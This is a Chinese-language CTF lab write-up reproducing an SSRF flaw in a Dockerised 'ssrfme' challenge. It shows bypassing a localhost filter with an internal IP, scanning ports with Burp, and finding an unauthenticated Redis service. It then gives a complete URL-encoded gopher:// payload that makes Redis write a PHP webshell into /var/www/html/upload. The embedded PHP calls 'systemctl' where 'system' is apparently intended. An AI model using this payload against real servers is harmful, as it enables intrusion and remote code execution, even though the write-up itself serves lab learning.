ssrf漏洞复现

目录

一、环境搭建

二、漏洞复现

一、环境搭建

1.安装docker（Docker-compose up -d ）、将web-ssrfme.zip解压缩在Ubuntu下。更新后的镜像重新启动容器，拉取ssrfme镜像。

2.构建docker-compose.yml文件

version: '3'
services:
        web:
                image: ctf/ssrfme
                ports:
                        - "8091:80"
        redis:
                image: web-ssrfme_redis

3.docker-compose up查看

二、漏洞复现

1.访问端口

2.使用端口访问文件，可以看到有一个过滤条件，它限制了file，dict协议，127.0.0.1和localhost 也不能用，其实就是不想你探测内网端口，也不能读取内网服务文件。

3.给info随便赋一个值，出来了php界面，可以观察到hostname主机和端口，而172.21.0.3是可以绕过127.0.0.1这个条件，我们可以在这个地址上测试，不断的改变端口值，端口不一样，出来的值也会有所区别。

4.使用burpsuite去检测端口1-1000.

5.发现只开了一个80端口。

6.发现80端口不可用，后续请教同学，经过扫描ip以及分析，得出6379端口也是对外开放，

7.分析这是redis的报错，说明这台内网主机上还运行着redis服务。 这个时候第一反应就是redis未授权访问，接着我们便可以尝试 redis 未授权了，由于这台内网主机上还存在一个http服务，所以我们可以将webshell写入其web目录，然后用ssrf进行访问。但是我们尝试发现不能直接在/var/www/html目录下写文件，我们使用burp扫一下都有哪些目录，发现有个upload目录。、

8.经测试upload目录下是可写的，使用工具生成payload

9.get传参，进行编码

gopher://172.21.0.3:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252436%250D%250A%250A%250A%253C%253Fphp%2520systemctl%2528%2527cat%2520/flag%2527%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A/var/www/html/upload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A%0A

10.拿到flag